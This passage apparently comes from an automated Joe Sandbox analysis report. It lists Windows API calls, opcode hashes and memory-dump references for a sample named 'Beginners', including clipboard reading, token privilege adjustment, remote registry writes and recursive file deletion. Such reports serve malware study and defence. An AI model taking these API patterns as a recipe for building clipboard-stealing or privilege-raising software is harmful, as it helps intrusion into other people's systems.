                                          • _memset.LIBCMT ref: 00117CB4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw_memsetstd::exception::exception
                                          • String ID:
                                          • API String ID: 525207782-0
                                          • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                          • Instruction ID: 364800cab0e4a64f10b0daa454f6d972303b0449643cb0f011d018b71caa58e1
                                          • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                          • Instruction Fuzzy Hash: F501E4742042019FD325EF5CD541F89BBE1AF59310F24846AF5888B3A2DB72A840CBA1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _fseek
                                          • String ID:
                                          • API String ID: 2937370855-0
                                          • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                          • Instruction ID: bf02c0021b7c50d78a6608fc27eaef089cfa4156be0b4dcd66416473b15f8dae
                                          • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                          • Instruction Fuzzy Hash: B1F085B6400208BFDF118F84DC00DEFBB79EB89724F04419CF9045A211D272EA21DBB1
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,?,000C27AF,?,00000001), ref: 000C4A63
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 9adf7dd1832b3c0e9e335d3feb9a5e0104aec1f377a4400dc564c263fba1fb2b
                                          • Instruction ID: fc378f20cc3e92a9368f5092ecf35b7c319038bdb4094c231f5648ba12684594
                                          • Opcode Fuzzy Hash: 9adf7dd1832b3c0e9e335d3feb9a5e0104aec1f377a4400dc564c263fba1fb2b
                                          • Instruction Fuzzy Hash: 00F08571140B01CFCB748F64E8A0E2ABBF0BF08326320A92EE5E683620C3719980CF05
                                          APIs
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID:
                                          • API String ID: 2638373210-0
                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                          • Instruction ID: 6459a5e4f65d2ab3abd49951928c80401412b0de1dec10bddab3d2d1469624db
                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                          • Instruction Fuzzy Hash: A7F0587240020DFFDF05CF80C941EAEBB79FB08314F208189FC188A252D732DA21ABA1
                                          APIs
                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000D09E4
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          Similarity
                                          • API ID: LongNamePath_memmove
                                          • String ID:
                                          • API String ID: 2514874351-0
                                          • Opcode ID: 069a6aefe91cb0682260eb94b5ee8ea740c828eb52dd599ce041eb7612296746
                                          • Instruction ID: 06b1527ba1eb63cdae9407c97bc6de9b838ac87519012693bdc313e61e1f26e4
                                          • Opcode Fuzzy Hash: 069a6aefe91cb0682260eb94b5ee8ea740c828eb52dd599ce041eb7612296746
                                          • Instruction Fuzzy Hash: 42E086369041285BC72196999C05FEE77DDEB8A6A1F0402B6FD08D7255D9709C8186D1
                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00114D31
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          Similarity
                                          • API ID: FolderPath_memmove
                                          • String ID:
                                          • API String ID: 3334745507-0
                                          • Opcode ID: a8db73b72b465953e1e1a527cac4fd83e542a9dd8713b80bf217deb2a50280d9
                                          • Instruction ID: 69833f930bf3d2d21c7142f12c1be376d1da78430247ad16c95b98cd935192c2
                                          • Opcode Fuzzy Hash: a8db73b72b465953e1e1a527cac4fd83e542a9dd8713b80bf217deb2a50280d9
                                          • Instruction Fuzzy Hash: 61D05EB590032C2BDB60E6A59C0DDFB7BACD745220F0006A57D5CC3112ED349D8586E0
                                          APIs
                                            • Part of subcall function 0011384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00113959,00000000,00000000,?,001005DB,00168070,00000002,?,?), ref: 001138CA
                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,001005DB,00168070,00000002,?,?,?,00000000), ref: 00113967
                                          Similarity
                                          • API ID: File$PointerWrite
                                          • String ID:
                                          • API String ID: 539440098-0
                                          • Opcode ID: 5b316713d0ccc8f42d42a13fb076885dfc97c4970396f5fd501cfe1da55da612
                                          • Instruction ID: 1a4470f59715b3729958ad8d50df97fa5ab3b7ff91021caf4efa45718452973b
                                          • Opcode Fuzzy Hash: 5b316713d0ccc8f42d42a13fb076885dfc97c4970396f5fd501cfe1da55da612
                                          • Instruction Fuzzy Hash: 3CE04F35410208BBDB20AF94D801BDAB7BCEF05710F00465AFD4091511D7B2AE549B90
                                          APIs
                                          • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00113E7D,?,?,?), ref: 00113F0D
                                          Similarity
                                          • API ID: CopyFile
                                          • String ID:
                                          • API String ID: 1304948518-0
                                          • Opcode ID: 11bd7973ed1baa9d4359064058c83c300a98f0b31c8ae0894d108584f19c084d
                                          • Instruction ID: 9bc065f009a7b43c421d9c65272114d1fc85b8e488c330e24fcfb55adb965727
                                          • Opcode Fuzzy Hash: 11bd7973ed1baa9d4359064058c83c300a98f0b31c8ae0894d108584f19c084d
                                          • Instruction Fuzzy Hash: D2D0A7315E020CBBEF50DFA0CC06F68B7ACE706706F1002A4BA04D90E0DAB269149795
                                          APIs
                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,001006E6,00000000,00000000,00000000), ref: 000C42BF
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: c9a0fab13531658ed67d4151fef1ae1394579d4141a9aafce8ebafdf8670235f
                                          • Instruction ID: 54cd5c6177dcf019e3898bffc0b109f3be8e443533b466c9e2fffed647fd9fa6
                                          • Opcode Fuzzy Hash: c9a0fab13531658ed67d4151fef1ae1394579d4141a9aafce8ebafdf8670235f
                                          • Instruction Fuzzy Hash: F0D0C77464020CBFE711DB81DC46FA9777CEB05710F100194FE0466690D6B27D508795
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 180fb3183c605544b0d090ead7f008ac7e20578de3da1806c776b742708dfdfd
                                          • Instruction ID: f4555942003cd8bc16b30d27a3300af4a6262c9706995de46c2eb56506ba5a59
                                          • Opcode Fuzzy Hash: 180fb3183c605544b0d090ead7f008ac7e20578de3da1806c776b742708dfdfd
                                          • Instruction Fuzzy Hash: EAB09239000602579D2C1E3C19680D933015957BA97D81B95E87885AF1933988CBA5A2
                                          APIs
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction ID: 94cc4fca8392b6733cce254187034c274922123b96381c58c7b7211e22e40621
                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                          • Instruction Fuzzy Hash: F3B09B7544020C77CE011941EC03A553B195740669F404011FF0C1C162A57395605995
                                          APIs
                                          • GetLastError.KERNEL32(00000002,00000000), ref: 0011D842
                                          Similarity
                                          • API ID: ErrorLast
                                          • String ID:
                                          • API String ID: 1452528299-0
                                          • Opcode ID: 058e390d92fa0b6860635705874019dea823f679790b5c58beec51cacca32821
                                          • Instruction ID: 549695bf83e29f9845851993b91d5b10b9ffe7fc942ef72a7a430e3a6fe8e367
                                          • Opcode Fuzzy Hash: 058e390d92fa0b6860635705874019dea823f679790b5c58beec51cacca32821
                                          • Instruction Fuzzy Hash: 69713F742083028FC718EF64D491EEEB7E1AF89354F044A6DF596972A3DB30E945CB52
                                          APIs
                                            • Part of subcall function 00114005: FindFirstFileW.KERNEL32(?,?), ref: 0011407C
                                            • Part of subcall function 00114005: DeleteFileW.KERNEL32(?,?,?,?), ref: 001140CC
                                            • Part of subcall function 00114005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 001140DD
                                            • Part of subcall function 00114005: FindClose.KERNEL32(00000000), ref: 001140F4
                                          • GetLastError.KERNEL32 ref: 0011C292
                                          Similarity
                                          • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                          • String ID:
                                          • API String ID: 2191629493-0
                                          • Opcode ID: cba9ac77960a332ff35ca0366c590478ed226b499886039b4fab49e53a8066f5
                                          • Instruction ID: 5eaa98c66f800687abeada9c1ba59c50fe8dbf3ab4e3f196937527a0c6ae6ff6
                                          • Opcode Fuzzy Hash: cba9ac77960a332ff35ca0366c590478ed226b499886039b4fab49e53a8066f5
                                          • Instruction Fuzzy Hash: 31F08C322102108FCB14EF59D840FEAB7E5AF88720F058419F94A8B353CB70BD41CB95
                                          APIs
                                          • CloseHandle.KERNEL32(?,?,00000000,000F2F8B), ref: 000C42EF
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 4814543e39b0e47fad6f0b00f6becf902d6c5a6469a84f529c6e932c91ded876
                                          • Instruction ID: 4634971692521f5b965717577e88391fb7d4dc8955d9dc99369b8408292d5456
                                          • Opcode Fuzzy Hash: 4814543e39b0e47fad6f0b00f6becf902d6c5a6469a84f529c6e932c91ded876
                                          • Instruction Fuzzy Hash: D8E0B679800B01CFC3714F1AE81581AFBF4FFE53713614A2EE4E692660D3B0589ADB50
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0013D208
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0013D249
                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0013D28E
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0013D2B8
                                          • SendMessageW.USER32 ref: 0013D2E1
                                          • _wcsncpy.LIBCMT ref: 0013D359
                                          • GetKeyState.USER32(00000011), ref: 0013D37A
                                          • GetKeyState.USER32(00000009), ref: 0013D387
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0013D39D
                                          • GetKeyState.USER32(00000010), ref: 0013D3A7
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0013D3D0
                                          • SendMessageW.USER32 ref: 0013D3F7
                                          • SendMessageW.USER32(?,00001030,?,0013B9BA), ref: 0013D4FD
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0013D513
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0013D526
                                          • SetCapture.USER32(?), ref: 0013D52F
                                          • ClientToScreen.USER32(?,?), ref: 0013D594
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0013D5A1
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0013D5BB
                                          • ReleaseCapture.USER32 ref: 0013D5C6
                                          • GetCursorPos.USER32(?), ref: 0013D600
                                          • ScreenToClient.USER32(?,?), ref: 0013D60D
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0013D669
                                          • SendMessageW.USER32 ref: 0013D697
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0013D6D4
                                          • SendMessageW.USER32 ref: 0013D703
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0013D724
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0013D733
                                          • GetCursorPos.USER32(?), ref: 0013D753
                                          • ScreenToClient.USER32(?,?), ref: 0013D760
                                          • GetParent.USER32(?), ref: 0013D780
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0013D7E9
                                          • SendMessageW.USER32 ref: 0013D81A
                                          • ClientToScreen.USER32(?,?), ref: 0013D878
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0013D8A8
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0013D8D2
                                          • SendMessageW.USER32 ref: 0013D8F5
                                          • ClientToScreen.USER32(?,?), ref: 0013D947
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0013D97B
                                            • Part of subcall function 000B29AB: GetWindowLongW.USER32(?,000000EB), ref: 000B29BC
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0013DA17
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F
                                          • API String ID: 3977979337-4164748364
                                          • Opcode ID: 175a552329c0cffa49d789009d86302bfef84e3e78c82b92f0d2b36dcf215983
                                          • Instruction ID: d5d11d216b2d40333918113afa5984411fa81190da9dd3a296d2c3b37d5580fe
                                          • Opcode Fuzzy Hash: 175a552329c0cffa49d789009d86302bfef84e3e78c82b92f0d2b36dcf215983
                                          • Instruction Fuzzy Hash: C342BD74208341AFD725CF28E848FAABBF5FF49310F140659F699872A1C771D998CB92
                                          APIs
                                            • Part of subcall function 00109399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001093E3
                                            • Part of subcall function 00109399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00109410
                                            • Part of subcall function 00109399: GetLastError.KERNEL32 ref: 0010941D
                                          • _memset.LIBCMT ref: 00108F71
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00108FC3
                                          • CloseHandle.KERNEL32(?), ref: 00108FD4
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00108FEB
                                          • GetProcessWindowStation.USER32 ref: 00109004
                                          • SetProcessWindowStation.USER32(00000000), ref: 0010900E
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00109028
                                            • Part of subcall function 00108DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00108F27), ref: 00108DFE
                                            • Part of subcall function 00108DE9: CloseHandle.KERNEL32(?,?,00108F27), ref: 00108E10
                                          Strings
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                          • String ID: $default$winsta0
                                          • API String ID: 2063423040-1027155976
                                          • Opcode ID: 073e9558f50c4a598dd0147952261cbaaac35706f4a60c79287f5585643ee0f2
                                          • Instruction ID: ea80bab06a121ea575763562bf66a4d9e3cba399700bfae4a710f6aca623aeaf
                                          • Opcode Fuzzy Hash: 073e9558f50c4a598dd0147952261cbaaac35706f4a60c79287f5585643ee0f2
                                          • Instruction Fuzzy Hash: FE819D71900209FFDF119FA0CC59AEE7B79FF09314F084129F991A62A2D7B28E55DB60
                                          APIs
                                          • OpenClipboard.USER32(00140980), ref: 0012465C
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0012466A
                                          • GetClipboardData.USER32(0000000D), ref: 00124672
                                          • CloseClipboard.USER32 ref: 0012467E
                                          • GlobalLock.KERNEL32(00000000), ref: 0012469A
                                          • CloseClipboard.USER32 ref: 001246A4
                                          • GlobalUnlock.KERNEL32(00000000), ref: 001246B9
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 001246C6
                                          • GetClipboardData.USER32(00000001), ref: 001246CE
                                          • GlobalLock.KERNEL32(00000000), ref: 001246DB
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0012470F
                                          • CloseClipboard.USER32 ref: 0012481F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                          • String ID:
                                          • API String ID: 3222323430-0
                                          • Opcode ID: ca53d983632d2354bb568cf3e5fb7acb3fa73989eb29f071c19edc15abff0735
                                          • Instruction ID: 19889064e40047d1541e1b920acf1766e23fc68b6aaba42ed16508e34e3a0b23
                                          • Opcode Fuzzy Hash: ca53d983632d2354bb568cf3e5fb7acb3fa73989eb29f071c19edc15abff0735
                                          • Instruction Fuzzy Hash: BE51C135204211ABD301EF61EC8AFAE77A8AF8AB10F01052DF656D31E2DF70D9558B62
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011CDD0
                                          • FindClose.KERNEL32(00000000), ref: 0011CE24
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0011CE49
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0011CE60
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0011CE87
                                          • __swprintf.LIBCMT ref: 0011CED3
                                          • __swprintf.LIBCMT ref: 0011CF16
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • __swprintf.LIBCMT ref: 0011CF6A
                                            • Part of subcall function 000D38C8: __woutput_l.LIBCMT ref: 000D3921
                                          • __swprintf.LIBCMT ref: 0011CFB8
                                            • Part of subcall function 000D38C8: __flsbuf.LIBCMT ref: 000D3943
                                            • Part of subcall function 000D38C8: __flsbuf.LIBCMT ref: 000D395B
                                          • __swprintf.LIBCMT ref: 0011D007
                                          • __swprintf.LIBCMT ref: 0011D056
                                          • __swprintf.LIBCMT ref: 0011D0A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 3953360268-2428617273
                                          • Opcode ID: dc9255ed1c8a94c2c306638cb55dae19f941e7254f33b6834c69aa0fb618701f
                                          • Instruction ID: a4e13219eaceb07975e09690453d70c0944845f69e3221117af9420219094bfe
                                          • Opcode Fuzzy Hash: dc9255ed1c8a94c2c306638cb55dae19f941e7254f33b6834c69aa0fb618701f
                                          • Instruction Fuzzy Hash: E2A13DB1408305ABC714EB64C986EEFB7ECEF95704F400929F59582193EB30DA45CB62
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0011F5F9
                                          • _wcscmp.LIBCMT ref: 0011F60E
                                          • _wcscmp.LIBCMT ref: 0011F625
                                          • GetFileAttributesW.KERNEL32(?), ref: 0011F637
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 0011F651
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0011F669
                                          • FindClose.KERNEL32(00000000), ref: 0011F674
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0011F690
                                          • _wcscmp.LIBCMT ref: 0011F6B7
                                          • _wcscmp.LIBCMT ref: 0011F6CE
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011F6E0
                                          • SetCurrentDirectoryW.KERNEL32(0016B578), ref: 0011F6FE
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0011F708
                                          • FindClose.KERNEL32(00000000), ref: 0011F715
                                          • FindClose.KERNEL32(00000000), ref: 0011F727
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1803514871-438819550
                                          • Opcode ID: 42964b281ead5da0b41153e3a4e5564029d6bd50af9ea6f43cecacd2d8d42d5a
                                          • Instruction ID: 66069fc6e95152a2a1b9e1f324f49544830a0e1f738e4933e610799ef2b7f706
                                          • Opcode Fuzzy Hash: 42964b281ead5da0b41153e3a4e5564029d6bd50af9ea6f43cecacd2d8d42d5a
                                          • Instruction Fuzzy Hash: 8131D575644219AADB25DFB5EC49EEE77ACAF09321F100179F904D31E0DB70DAC5CA60
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00130FB3
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00140980,00000000,?,00000000,?,?), ref: 00131021
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00131069
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 001310F2
                                          • RegCloseKey.ADVAPI32(?), ref: 00131412
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0013141F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: 2a7e92d1f9249b5bc8589b1aed5daeeac33271cce6a05f03c1fc8cef13f43df0
                                          • Instruction ID: 1a79a11fad294a8e48bb57749d5cbd321b1a5ca971854c1b0a2063ab003cc3ff
                                          • Opcode Fuzzy Hash: 2a7e92d1f9249b5bc8589b1aed5daeeac33271cce6a05f03c1fc8cef13f43df0
                                          • Instruction Fuzzy Hash: 21026D75200601AFCB15EF25C891EAAB7E5FF89710F04895DF99A9B362CB30ED41CB91
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 0011F756
                                          • _wcscmp.LIBCMT ref: 0011F76B
                                          • _wcscmp.LIBCMT ref: 0011F782
                                            • Part of subcall function 00114875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00114890
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0011F7B1
                                          • FindClose.KERNEL32(00000000), ref: 0011F7BC
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 0011F7D8
                                          • _wcscmp.LIBCMT ref: 0011F7FF
                                          • _wcscmp.LIBCMT ref: 0011F816
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011F828
                                          • SetCurrentDirectoryW.KERNEL32(0016B578), ref: 0011F846
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0011F850
                                          • FindClose.KERNEL32(00000000), ref: 0011F85D
                                          • FindClose.KERNEL32(00000000), ref: 0011F86F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: 725f6d7cacdbd1f5179c32ecf9bc5720ab45f9785322fed5aebf2fc054f9e68c
                                          • Instruction ID: 72f37478ad4eccd7a68b97faee0fb08a84a9a4d150280c0c822cd8c289a82683
                                          • Opcode Fuzzy Hash: 725f6d7cacdbd1f5179c32ecf9bc5720ab45f9785322fed5aebf2fc054f9e68c
                                          • Instruction Fuzzy Hash: A631D47650461ABADB24DFB5DC88AEE77AC9F09321F140179E904E21F1DB70CED6CA60
                                          APIs
                                            • Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00108E3C
                                            • Part of subcall function 00108E20: GetLastError.KERNEL32(?,00108900,?,?,?), ref: 00108E46
                                            • Part of subcall function 00108E20: GetProcessHeap.KERNEL32(00000008,?,?,00108900,?,?,?), ref: 00108E55
                                            • Part of subcall function 00108E20: HeapAlloc.KERNEL32(00000000,?,00108900,?,?,?), ref: 00108E5C
                                            • Part of subcall function 00108E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00108E73
                                            • Part of subcall function 00108EBD: GetProcessHeap.KERNEL32(00000008,00108916,00000000,00000000,?,00108916,?), ref: 00108EC9
